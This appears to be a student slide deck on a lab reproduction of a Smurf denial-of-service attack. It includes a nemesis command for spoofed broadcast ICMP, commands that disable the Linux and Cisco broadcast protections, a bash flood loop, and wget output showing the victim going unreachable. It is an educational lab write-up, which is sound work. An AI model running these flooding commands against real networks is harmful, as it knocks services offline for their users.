![Page 1: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/1.jpg)
Smurf AttackFarhan Sajjad
![Page 2: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/2.jpg)
OutlineSmurf Attack
What is a Smurf Attack?How is it Engineered?
Project 1Test EnvironmentConducting the AttackResults and Observations
ReferencesQuestions?
![Page 3: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/3.jpg)
What is a Smurf Attack?Denial of Service Attack using spoofed
broadcast ping messages.
![Page 4: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/4.jpg)
How is it Engineered?Essentially, by “spoofing” a broadcasted ICMP
Echo request with the victim’s IP address as the sender
The ICMP Header
![Page 5: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/5.jpg)
Sample Spoofroot@jotilMove# nemesis icmp -v -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 08:00:27:29:4C:F0
ICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26) [MAC] 08:00:27:29:4C:F0 > FF:FF:FF:FF:FF:FF [Ethernet type] IP (0x0800) [IP] 192.168.0.5 > 192.168.0.255 [IP ID] 3121 [IP Proto] ICMP (1) [IP TTL] 255 [IP TOS] 0x00 [IP Frag offset] 0x0000 [IP Frag flags] [ICMP Type] Echo Request [ICMP Code] Echo Request [ICMP ID] 57730 [ICMP Seq number] 8233 Wrote 42 byte ICMP packet through linktype DLT_EN10MB. ICMP Packet Injected
![Page 6: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/6.jpg)
The Test Environment
![Page 7: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/7.jpg)
The Test Environment (continued)All the Linux machines had Wireshark installed on
themThe attacker had Nemesis installed on it, to generate
spoofed IP packetsThe victim had HTTP server on it, to check its
availabilityHad to turn on No-IP Directed Broadcast
Linux OS: root@jotilMove# echo "0" | cat > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
Cisco IOS: RouterC(config)#int f0/0RouterC(config-if)#ip directed-broadcast
![Page 8: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/8.jpg)
Conducting the AttackCreated a small payload file of size 1472
bytesRan a small script at the attacking machine,
which looped to send spoofed ICMP packets#!/bin/bashi=10000while test $i != 0do
nemesis icmp -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 00:06:29:DF:2A:DA -P payload_fileecho "$i"i=`expr $i - 1`
done
![Page 9: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/9.jpg)
Results
The Attacker’s Screenshot
![Page 10: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/10.jpg)
The Victim’s Screenshot During Attack
![Page 11: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/11.jpg)
The Victim’s Screenshot After Attack
![Page 12: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/12.jpg)
The Observer’s Screenshot
![Page 13: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/13.jpg)
root@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:49:45-- http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:49:45 (15.1 MB/s) - `index.html' saved [177/177]
real 0m0.008suser 0m0.004ssys 0m0.000sroot@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:50:03-- http://192.168.0.5/Connecting to 192.168.0.5:80... failed: Connection timed out.Retrying....--2009-11-13 20:59:36-- (try: 4) http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:59:36 (18.1 MB/s) - `index.html' saved [177/177]
real 9m33.041suser 0m0.008ssys 0m0.000s
![Page 14: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/14.jpg)
ObservationsNumber of participating nodes crucial to the
effectiveness of the attackHardly effected the CPU or Memory utilization
of the Victim, however its network resources were overwhelmed and its services were unreachable
Networked devices after 1998 has turned off No-IP directed broadcasts, so it is difficult to conduct such attacks, however Smurf Amplifiers exists!
![Page 15: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/15.jpg)
References[1] Smurf attack, from Wikipedia: http://en.wikipedia.org/wiki/Smurf_attack[2] smurf.c, [Online document] Available: http://personal.telefonica.terra.es/web/alexb/e/smurf.c[3] The Internet Control Message Protocol, from Wikipedia:
http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol[4] Ping, from Wikipedia: http://en.wikipedia.org/wiki/Ping[5] The ICMP Header. [Online document] Available: http://blog.csdn.net/xuhx/archive/2008/04/16/2297266.aspx[6] How a Broadcast Address Works. [Online document] Available:
http://learn-networking.com/network-design/how-a-broadcast-address-works[7] Denial-of-service attack, from Wikipedia: http://en.wikipedia.org/wiki/Denial-of-service_attack[8] Nemesis Packet Injection Tool Suite. [Online document] Available: http://nemesis.sourceforge.net/[9] Manpage of NEMESIS-ICMP. [Online document] Available:
http://nemesis.sourceforge.net/manpages/nemesis-icmp.1.html[10] Wireshark. [Online document] Available: http://www.wireshark.org/[11] Securing Cisco Routers with No IP Directed-Broadcast. [Online document] Available:
http://learn-networking.com/network-security/securing-cisco-routers-with-no-ip-directed-broadcast[12] Craig A. Hugen, The latest in denial of service attacks: "Smurfing". Description and information to minimize
effects. [Online document] Available: http://www.pentics.net/denial-of-service/white-papers/smurf.cgi[13] CERT® Advisory CA-1998-01 Smurf IP Denial-of-Service Attacks. [Online document] Available:
http://www.cert.org/advisories/CA-1998-01.html[14] Smurf Attack. [Online document] Available:
http://www.softpanorama.org/Net/Internet_layer/ICMP/smurf_attack.shtml[15] Smurf Amplifier Registry [Online document] Available: http://www.powertech.no/smurf/[16] Brian Hatch, Firewalling /proc entries [Online document] Available:
http://www.hackinglinuxexposed.com/articles/20021015.html[17] Todd Lammle, CCNA: Cisco Certified Network Associate Study Guide. ISBN: 978-0470110089. Publisher:
Sybex; 6 edition (August 29, 2007).
![Page 16: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/16.jpg)
Questions?
![Page 17: Farhan Sajjad. Outline Smurf Attack What is a Smurf Attack? How is it Engineered? Project 1 Test Environment Conducting the Attack Results and Observations](https://reader035.vdocuments.net/reader035/viewer/2022062715/56649d825503460f94a6882f/html5/thumbnails/17.jpg)
Thank You!